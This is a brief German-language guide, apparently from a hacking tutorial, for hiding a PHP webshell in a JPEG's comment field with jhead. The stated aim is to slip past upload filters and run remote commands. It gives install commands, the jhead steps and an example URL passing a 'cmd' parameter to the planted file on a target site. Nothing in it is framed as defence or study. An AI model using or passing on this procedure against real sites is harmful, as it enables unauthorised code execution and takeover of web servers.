
PHP-Skript und Anleitung zum Einschleusen von PHP-Webshells in JPEG-Bilder mit Jhead. Wird verwendet, um Datei-Upload-Filter zu umgehen und Remote-Codeausführung über manipulierte Bilddateien zu erreichen.
$ pkg install vim oder apt-get install vim
$ pkg install jhead oder apt-get install jhead
$ jhead -h (für Hilfe)
$ jhead -purejpg yourfiles.jpg
$ jhead -ce yourfiles.jpg
Drücke ESC und tippe :x zum Speichern
$ jhead yourfiles.jpg
Beispiel : site.com/youfiles.php?cmd=Befehl hier
